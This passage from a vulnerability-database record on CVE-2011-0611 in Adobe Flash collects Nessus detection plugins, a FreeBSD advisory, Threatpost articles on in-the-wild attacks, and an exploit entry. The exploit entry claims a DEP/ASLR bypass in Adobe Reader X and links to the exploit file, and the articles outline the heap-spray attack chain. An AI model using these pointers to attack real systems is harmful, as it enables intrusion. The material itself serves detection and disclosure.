iver[3] < 1)\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 10.2.159.1\\n';\n }\n # Chrome\n else if (\n (\"Chrome\" >< variant) && (\n iver[0] < 10 ||\n (\n iver[0] == 10 &&\n (\n iver[1] < 2 ||\n (\n iver[1] == 2 &&\n (\n iver[2] < 154 ||\n (iver[2] == 154 && iver[3] < 27)\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n info += '\\n Product: Browser Plugin (for Google Chrome)';\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver ;\n info += '\\n Fixed version : 10.2.154.27 (as included with Google Chrome 10.0.648.205)\\n';\n }\n }\n }\n } \n}\n\nif (info)\n{\n if (report_verbosity > 0) security_hole(port:get_kb_item(\"SMB/transport\"), extra:info);\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, 'The host is not affected.');\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:15:40", "description": "The remote Windows host contains a version of Adobe AIR earlier than\n2.6.0.19140. Such versions are reportedly affected by a memory\ncorruption vulnerability. \n\nBy tricking a user on the affected system into opening a specially\ncrafted document with Flash content, such as a SWF file embedded in a\nMicrosoft Word document, an attacker can potentially leverage this\nissue to execute arbitrary code remotely on the system subject to the\nuser's privileges. \n\nNote that there are reports that this issue is being exploited in the\nwild as of April 2011.", "edition": 27, "published": "2011-04-18T00:00:00", "title": "Adobe AIR < 2.6.0.19140 ActionScript Predefined Class Prototype Addition Remote Code Execution (APSB11-07)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB11-07.NASL", "href": "https://www.tenable.com/plugins/nessus/53474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53474);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2011-0611\");\n script_bugtraq_id(47314);\n script_xref(name:\"CERT\", value:\"230057\");\n script_xref(name:\"Secunia\", value:\"44119\");\n\n script_name(english:\"Adobe AIR < 2.6.0.19140 ActionScript Predefined Class Prototype Addition Remote Code Execution (APSB11-07)\");\n script_summary(english:\"Checks version of Adobe AIR\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host contains a version of Adobe AIR that allows\narbitrary code execution.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host contains a version of Adobe AIR earlier than\n2.6.0.19140. Such versions are reportedly affected by a memory\ncorruption vulnerability. \n\nBy tricking a user on the affected system into opening a specially\ncrafted document with Flash content, such as a SWF file embedded in a\nMicrosoft Word document, an attacker can potentially leverage this\nissue to execute arbitrary code remotely on the system subject to the\nuser's privileges. \n\nNote that there are reports that this issue is being exploited in the\nwild as of April 2011.\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?9ee82b34\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www.adobe.com/support/security/bulletins/apsb11-07.html\");\n script_set_attribute(attribute:\"solution\",value:\"Upgrade to Adobe AIR 2.6.0.19140 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value: \"2011/04/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\nfix = '2.6.0.19140';\nfix_ui = '2.6';\n\nif (ver_compare(ver:version, fix:fix) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n exit(0);\n}\nelse exit(0, \"The host is not affected since Adobe AIR \"+version_report+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:14:47", "description": "The remote Windows host contains a version of Adobe Acrobat 9.x <\n9.4.4 or 10.x < 10.0.3. Such versions are affected by multiple memory\ncorruption vulnerabilities.\n\nA remote attacker could exploit this by tricking a user into viewing a\nmalicious crafted PDF file, resulting in arbitrary code execution.\n\nNote also, CVE-2011-0611 is being exploited in the wild as of April\n2011.", "edition": 27, "published": "2011-04-15T00:00:00", "title": "Adobe Acrobat 9.x / 10.x Multiple Vulnerabilities (APSB11-08)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0610", "CVE-2011-0611"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSA11-02.NASL", "href": "https://www.tenable.com/plugins/nessus/53450", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(53450);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2011-0610\", \"CVE-2011-0611\");\n script_bugtraq_id(47314, 47531);\n script_xref(name:\"CERT\", value:\"230057\");\n script_xref(name:\"Secunia\", value:\"44149\");\n\n script_name(english:\"Adobe Acrobat 9.x / 10.x Multiple Vulnerabilities (APSB11-08)\");\n script_summary(english:\"Checks version of Adobe Acrobat and authplay.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat on the remote Windows host is affected by\nmultiple memory corruption vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host contains a version of Adobe Acrobat 9.x <\n9.4.4 or 10.x < 10.0.3. Such versions are affected by multiple memory\ncorruption vulnerabilities.\n\nA remote attacker could exploit this by tricking a user into viewing a\nmalicious crafted PDF file, resulting in arbitrary code execution.\n\nNote also, CVE-2011-0611 is being exploited in the wild as of April\n2011.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ee82b34\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-08.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 9.4.4 / 10.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/04/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Acrobat/Version\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Acrobat/Version\");\npath = get_kb_item_or_exit(\"SMB/Acrobat/Path\");\n\nversion_ui = get_kb_item(\"SMB/Acrobat/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\nreport = '';\n# This affects 9.x < 9.4.4 / 10.x < 10.0.3\nif (\n # 9.x\n (\n (ver[0] == 9 && ver[1] < 4) ||\n (ver[0] == 9 && ver[1] == 4 && ver[2] < 4)\n )\n)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : 9.4.4 / 10.0.3\\n';\n}\nelse if (ver[0] == 10 && ver[1] == 0 &&\n (ver[2] < 1 || (ver[2] == 1 && ver[3] <= 434)))\n{\n path = get_kb_item_or_exit('SMB/Acrobat/Path');\n name = kb_smb_name();\n #port = kb_smb_transport();\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n\n #if (!get_port_state(port)) exit(0, \"Port \"+port+\" is not open.\");\n #soc = open_sock_tcp(port);\n #if (!soc) exit(1, \"Failed to open a socket on port \"+port+\".\");\n\n #session_init(socket:soc, hostname:name);\n if(!smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\n\n\n share = ereg_replace(pattern:'^([A-Za-z]):.*', replace:'\\\\1$', string:path);\n dll = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:'\\\\1\\\\Acrobat\\\\authplay.dll', string:path);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n exit(1, 'Can\\'t connect to '+share+' share.');\n }\n\n fh = CreateFile(\n file:dll,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n if (isnull(fh))\n {\n NetUseDel();\n exit(1, 'Unable to access : '+path+'\\\\Acrobat\\\\authplay.dll.');\n }\n dllver = GetProductVersion(handle:fh);\n dllver = split(dllver, sep:',', keep:FALSE);\n\n CloseFile(handle:fh);\n NetUseDel();\n if (isnull(dllver)) exit(1, 'Can\\'t get the version of '+path+'\\\\Acrobat\\\\authplay.dll.');\n\n dllversion = join(sep:'.', dllver);\n fixdll = '10.2.159.1';\n if (ver_compare(ver:dllversion, fix:fixdll) == -1)\n {\n report =\n '\\n DLL : ' + path + '\\\\Acrobat\\\\authplay.dll' +\n '\\n Installed version : ' + dllversion +\n '\\n Fixed version : ' + fixdll + '\\n';\n }\n}\nif (report)\n{\n if (report_verbosity > 0) security_hole(port:get_kb_item('SMB/transport'), extra:report);\n else security_hole(get_kb_item('SMB/transport'));\n}\nelse exit(0, \"The host is not affected.\");\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:59", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0611"], "description": "\nAdobe Product Security Incident Response Team reports:\n\nA critical vulnerability exists in Flash Player 10.2.153.1\n\t and earlier versions (Adobe Flash Player 10.2.154.25 and\n\t earlier for Chrome users) for Windows, Macintosh, Linux\n\t and Solaris, Adobe Flash Player 10.2.156.12 and earlier\n\t versions for Android, and the Authplay.dll component that\n\t ships with Adobe Reader and Acrobat X (10.0.2) and earlier\n\t 10.x and 9.x versions for Windows and Macintosh operating\n\t systems.\nThis vulnerability (CVE-2011-0611) could cause a crash\n\t and potentially allow an attacker to take control of the\n\t affected system. There are reports that this vulnerability\n\t is being exploited in the wild in targeted attacks via a\n\t malicious Web page or a Flash (.swf) file embedded in a\n\t Microsoft Word (.doc) or Microsoft Excel (.xls) file\n\t delivered as an email attachment, targeting the Windows\n\t platform. At this time, Adobe is not aware of any attacks\n\t via PDF targeting Adobe Reader and Acrobat. Adobe Reader\n\t X Protected Mode mitigations would prevent an exploit of\n\t this kind from executing.\n\n", "edition": 4, "modified": "2011-01-20T00:00:00", "published": "2011-01-20T00:00:00", "id": "32B05547-6913-11E0-BDC4-001B2134EF46", "href": "https://vuxml.freebsd.org/freebsd/32b05547-6913-11e0-bdc4-001b2134ef46.html", "title": "linux-flashplugin -- remote code execution vulnerability", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:05:44", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611"], "description": "[![Flash patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060837/adobe_flash_patch_0.thumbnail.jpg)](<https://threatpost.com/adobe-releases-patch-flash-zero-day-hole-reader-acrobat-042111/>)Adobe has released patches for its Reader and Acrobat products to plug a hole in the Flash Player that was first reported in March and is being used in attacks on the Internet.\n\nThe company issued a security update on Thursday, [APSB11-08](<http://blogs.adobe.com/psirt/2011/04/security-updates-available-for-adobe-reader-and-acrobat-apsb11-08.html>), that repairs critical vulnerabilities in current versions of Adobe Reader and Acrobat X for Windows. Adobe warned that the vulnerability, CVE-2011-0611, is being actively exploited in the wild against both Adobe Flash Player, Reader and Acrobat and in a Flash file embedded in other files such as Microsoft Word and Excel documents.The hole allowed remote attackers to run arbitrary code on vulnerable machines. \n\nThe updates address a critical vulnerability that first [came to light on March 14](<https://threatpost.com/adobe-warns-attacks-critical-flash-player-bug-031411/>). The company pushed out a critical patch for Flash Player, Reader and Acrobat a week later. Adobe released a security bulletin addressing the issue on April 11 and a Flash Player for Google\u2019s Chrome Web browser and the Windows, Apple Macintosh, Linux and Solaris operating systems on April 14 and 15. The company had [originally targeted the Reader and Acrobat fixes for April 25](<https://threatpost.com/adobe-patch-flash-zero-day-windows-mac-friday-041411/>), but delivered them on the 21st, instead. \n\nThe patches are for Flash Player 10.2.153.1 and earlier for versions of Windows, Mac, Linux and Solaris, 10.2.154.25 and earlier for Chrome and 10.2.156.12 and earlier for Android. The patches also update authplay.dll, a component that ships with Reader and Acrobat X (10.0.2 and earlier 10.x and 9.x versions for Windows and Mac, and Adobe AIR 2.6.19120 and earlier for Windows Mac and Linux, Adobe said in a blog post on its support Web site. The company strongly encouraged users to apply the patch for the vulnerability, which it rates \u201cCritical.\u201d \n", "modified": "2013-04-17T16:34:43", "published": "2011-04-21T20:11:41", "id": "THREATPOST:D88693546B31883668AC9C41021BDA5B", "href": "https://threatpost.com/adobe-releases-patch-flash-zero-day-hole-reader-acrobat-042111/75154/", "type": "threatpost", "title": "Adobe Releases Patch for Flash Zero Day Hole in Reader, Acrobat", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:46", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611"], "description": "[![Adobe Word](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060827/adobe_word.jpg)](<https://threatpost.com/analysis-new-adobe-flash-attacks-041311/>)When Adobe warned customers earlier this week about a [newly discovered vulnerability in the Flash Player](<https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/>) software, company officials said that there were already attacks underway against the bug. Those attacks are using malicious Flash files buried in Word documents and Microsoft\u2019s security engineers have analyzed the exploits and found some interesting details.\n\nThis is the second serious Flash vulnerability in recent weeks that attackers have targeted through the use of malicious Office files. In a previous round of attacks, hackers were going after an earlier Flash zero day with rigged Excel files. This time, Microsoft officials said, not only is the bug different, but so is the attack. Though both attacks use malicious Office files to trick users, the details are dissimilar.\n\nThe attack presents to the user via a spam message, often with a subject line referencing the Fukushima nuclear disaster, and carrying a malicious Word document as an attachment. \n\n\u201cOnce a user opens the document, Flash Player will load the malicious \nfile and exploitation will occur. Unlike the previous vulnerability, a \nbug in the ActionScript Virtual Machine version 1 is now used in the \nexploitation process. Another difference is that this is not a result of \nfuzzing clean files. We won\u2019t disclose any detail on what triggers the \nvulnerability, for security reasons, obviously,\u201d Marian Radu, Daniel Radu and Jaime Wong of the Microsoft Malware Protection Center wrote in an [analysis of the Flash exploit](<http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx>) attempts. \n\n\u201cIn order to exploit this vulnerability the attackers packaged the \nAVM1 code inside an AVM2 based Flash file. The latter is embedded inside \nthe Word document and assigned with setting up the exploitation \nenvironment. Initially the AVM2 code constructs a heap-spray buffer made of a NOP-sled.\u201d\n\nThe next step is the construction of the shellcode, which in turn then loads the Flash exploit code inside the Flash Player.\n\n\u201cThe AVM1 code that triggers this vulnerability is loaded as a separate \nSWF file, converted from a hex-encoded embedded string and executed,\u201d the researchers said.\n\nThe shellcode performs some other tasks, as well, including installing a benign Word document on the compromised machine as a way of hiding the original malicious file. \n\nThis attack method is essentially the one that the [attackers used to compromise RSA](<https://threatpost.com/rsa-securid-attack-was-phishing-excel-spreadsheet-040111/>) last month and steal some data related ot the company\u2019s SecurID product line.\n", "modified": "2013-04-17T16:34:45", "published": "2011-04-13T16:13:42", "id": "THREATPOST:CA3146FC939402FCEA258087D3508FFB", "href": "https://threatpost.com/analysis-new-adobe-flash-attacks-041311/75131/", "type": "threatpost", "title": "Analysis of the New Adobe Flash Attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:48", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611"], "description": "[![Flash bug](http://www.threatpost.com/sites/default/files/flash_bug_0.png)](<https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/>)Adobe on Monday warned its customers about a new unpatched vulnerability in its Flash Player application. Officials say that the bug is being used in targeted attacks involving a malicious Flash file embedded in a Microsoft Word document.\n\nThe Flash vulnerability affects users on Windows, Apple OS X, Linux and Solaris, as well as customers who use Flash on the Android platform. Adobe security officials said that the vulnerability\u2013which is in Flash 10.2.153.1 and earlier versions\u2013is being exploited by attackers right now through the use of rigged Flash files buried in Word documents. \n\n\u201cThis vulnerability (CVE-2011-0611) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild in targeted attacks via a Flash (.swf) file embedded in a Microsoft Word (.doc) file delivered as an email attachment, targeting the Windows platform. At this time, Adobe is not aware of any attacks via PDF targeting Adobe Reader and Acrobat.\u201d Adobe officials said in their [security bulletin on Flash](<http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html>).\n\nThe Flash bug also affects Adobe Reader and Acrobat, however the sandbox in Adobe Reader X can help prevent exploitation of the vulnerability. Adobe said that they are still in the process of figuring out the patch schedule for Flash and Acrobat. The company plans to patch Reader X in its next scheduled quarterly update, scheduled for June 14. \n\nThe news of the latest Flash vulnerability comes about 10 days after officials at RSA acknowledged that the [attack that compromised that company\u2019s SecurID product](<https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/>) line last month used an Excel spreadsheet that included a malicious Flash file.\n", "modified": "2013-04-17T16:34:45", "published": "2011-04-12T11:51:03", "id": "THREATPOST:E1674DBE48ED411E7EF48579A10BCF26", "href": "https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/75126/", "type": "threatpost", "title": "Adobe Flash Bug Being Used in Attacks Via Word Documents", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:44", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611", "CVE-2012-1889"], "description": "A five-year campaign primarily focused on extracting sensitive information from Japanese oil, gas, and electric utilities was outlined by researchers on Tuesday.\n\nReferred to as [Operation Dust Storm](<https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/Op_Dust_Storm_Report.pdf?t=1456276906648>) (.PDF) by researchers at Cylance, the campaign has managed to stay persistent over the years, and especially lately, by using dynamic DNS domains and customized backdoors.\n\nWhile the group has recently narrowed its sights on Japan, it\u2019s also attacked industries in South Korea, the United States, and Europe, the firm claims.\n\nActivity surrounding the campaign really picked up steam in 2015 when a handful of backdoors with hardcoded proxy addresses and credentials surfaced. Researchers traced those addresses back and noticed a slew of corporations across the oil, natural gas, construction, and transportation sector had been compromised.\n\n> New SPEAR research: Extended campaign against Japanese critical infrastructure: <https://t.co/jq8fwhObyQ> [#opduststorm](<https://twitter.com/hashtag/opduststorm?src=hash>) [pic.twitter.com/kG4X6hmJiG](<https://t.co/kG4X6hmJiG>)\n> \n> \u2014 Cylance, Inc. (@cylanceinc) [February 23, 2016](<https://twitter.com/cylanceinc/status/702149003945709568>)\n\nThere was a wave of attacks that year, including a major Japanese automaker in February, and a Japanese subsidiary of a South Korean electric utility and other critical infrastructure outfits in July and October.\n\nThe campaign also began using custom Android backdoors in 2015 \u2013 at first the Trojan forwarded SMS messages, and later in the year, specific files, from infected devices to C&C servers.\n\nLike many groups in the early 2010s, early iterations of the Dust Storm\u2019s activity revolved around zero days in Internet Explorer and Flash.\n\nFor example, in 2011 the attackers used an IE 8 vulnerability to infiltrate networks. They were also seen sending victims spear phishing emails with Word documents rigged with a zero day Flash exploit, CVE-2011-0611. According to Cylance, in 2012 the attackers used the same Flash exploit, coupled with another IE exploit, CVE-2012-1889, to hit victims.\n\nIn addition to the IE and Flash vulnerabilities, the group relied mostly on phishing attacks in its infancy . In 2011 it tried to siphon up Yahoo and Windows Live credentials though domains it set up and later that year capitalized on the Libyan crisis with emails about Muammar Gaddafi it sent to US government and defense targets.\n\nWhile the backdoor dropped through these exploits made headlines years ago, the Cylance claims that reports around the group have mostly dissipated since.\n\nIt was Dust Storm\u2019s foray into duplicitous backdoors and proxies targeting Japanese resources that prompted researchers to investigate it in earnest last year.\n\n\u201cAs the group became more and more focused on Japan, less and less of their tactics and malware appeared in reports or write-ups. The targets identified escalated both in size and in the scope of affected industries,\u201d the report, penned by the firm\u2019s Director of Threat Intelligence Jon Gross, reads.\n\nWhile the Android Trojans only hit victims in Japan and South Korea, Gross acknowledges that the campaign around the attacks was \u201cmassive in comparison to previous operations,\u201d boasting over 200 domains.\n\nOfficials with SPEAR, Cylance\u2019s research division, make a point to say that they don\u2019t believe the Dust Storm attacks are intended to destructive, but that they may be part of a long con, with their goals most likely \u201creconnaissance and long-term espionage.\u201d\n\nWhile the attacks are ongoing, the group, who worked with the Japanese Computer Emergency Response Team (JP-CERT) to investigate the group, claim the reason they published their research was to hopefully stunt the group\u2019s progress.\n\nCylance doesn\u2019t directly attribute any group of individuals to the Dust Storm attacks but does hint that from March 2013 to August 2013 it observed a \u201cremarkable decrease\u201d in the about of malware it was able to gather surrounding the campaign. It acknowledges that Mandiant\u2019s APT 1 report, which was published in February of that year, follows more or less the same timeline, however.\n\nIn that report Mandiant outlined a series of cyber espionage campaigns carried out over the course of several years on a broad palette of victims by a Chinese threat organization, APT1.\n", "modified": "2016-03-03T00:39:24", "published": "2016-02-24T14:11:04", "id": "THREATPOST:684A9363491231773FDB7BA1EBA2B6C0", "href": "https://threatpost.com/five-year-dust-storm-apt-campaign-targets-japanese-critical-infrastructure/116436/", "type": "threatpost", "title": "Five-Year 'Dust Storm' APT Campaign Seen Targeting Japanese Critical Infrastructure", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:41", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611", "CVE-2011-2110"], "description": "Attention given to previously unknown or \u201czero day\u201d flaws may be overrated, according to research from Microsoft Corp. \n\nIn an analysis, \u201cZeroing in on Malware Propagation Methods,\u201d Microsoft follows the propagation of malware and how certain forms measure up against other vulnerability exploits. Microsoft examined infections reported by their [Malicious Software Removal Tool](<http://www.microsoft.com/security/pc-security/malware-removal.aspx>) (MSRT), given the tool\u2019s range and its connection to Windows/Microsoft Update.\n\nWhile the intent of Microsoft\u2019s report isn\u2019t to downplay Zero Day exploits, the company does suggest the attention they get is overblown.\n\nLess than 1 percent of the infections reported came from zero-day vulnerabilities, 0.12 percent to be exact. The two vulnerabilities that accounted for most of that 0.12 percent, [CVE-2011-0611](<https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/>) and CVE-2011-2110, affected Adobe\u2019s Flash Player.\n\nThe remaining infections were propagated through social engineering, AutoRun exploitation, file infection and password attacks, according to the report.\n\nMalware that relied on user interaction comprised 45 percent of the attacks measured while malware that exploited the system\u2019s AutoRun feature comprised 43 percent, or more than a third of all detections. 26 percent of the attacks came from USB threats and 17 percent from the network, respectively.\n\nSpanning well over 100 pages and drawing upon intelligence from 100+ countries, this year\u2019s Security Intelligence Report evaluated vulnerability disclosures for the first half of 2011, January 1 through June 30.\n\nWhen it comes to older vulnerabilities, the report suggests patch management is key going forward. Ninety percent of the recorded attacks are listed as Update Long Available, according to Vinny Gullotto, the general manager of Microsoft\u2019s Malware Protection Center (MMPC). This means that there had been a security update available for each of the vulnerabilities for at least a year before the recorded infection. While it\u2019s been made clear before that [cybercriminals are consistently targeting old vulnerabilities](<https://threatpost.com/forget-apt-mass-malware-still-big-threat-062011/>), new numbers show its imperative is to keep old products patched.\n", "modified": "2013-04-17T16:33:37", "published": "2011-10-11T17:41:11", "id": "THREATPOST:66AAE48AA5E53AA0EB4A9179456F65FC", "href": "https://threatpost.com/zero-day-flaws-overvalued-says-new-microsoft-report-101111/75737/", "type": "threatpost", "title": "Zero Day Flaws Overvalued Says New Microsoft Report", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Reader X 10.0.0 10.0.1 - Atom Type Confusion", "edition": 1, "published": "2011-07-03T00:00:00", "title": "Adobe Reader X 10.0.0 10.0.1 - Atom Type Confusion", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2011-07-03T00:00:00", "id": "EXPLOITPACK:1A046239C4FEFA2569E258EE0A65227F", "href": "", "sourceData": "# Exploit Title: Adobe Reader X Atom Type Confusion Vulnerability Exploit\n# Date: 7/3/2011\n# Author: Snake ( Shahriyar.j < at > gmail )\n# Version: Adobe Reader X < 10.1\n# Tested on: 10.0.0 - 10.0.1 - Windows 7 - IE/FF/Opera\n# CVE : CVE-2011-0611\n#\n#This is the exploit I wrote for Abysssec \"The Arashi\" article.\n#It gracefully bypass DEP/ASLR ( not the sandbox ) in Adobe Reader X,\n#and we named this method \"Tatsumaki DEP/ASRL Bypass\" : >\n#It work reliably on IE9/FF4 and other browsers.\n#\n# The Arashi : http://abysssec.com/files/The_Arashi.pdf\n http://www.exploit-db.com/docs/17469.pdf\n# me : twitter.com/ponez\n# also check here for The Persian docs of this methods and more :\nhttp://www.0days.ir/article/\n\nExploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17473.pdf (cve-2011-0611_exploit.pdf)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-07-11T20:28:24", "description": "This module exploits a vulnerability in Adobe Flash Player that was discovered, and has been exploited actively in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory, and results arbitrary code execution. Please note for IE 8 targets, Java Runtime Environment must be available on the victim machine 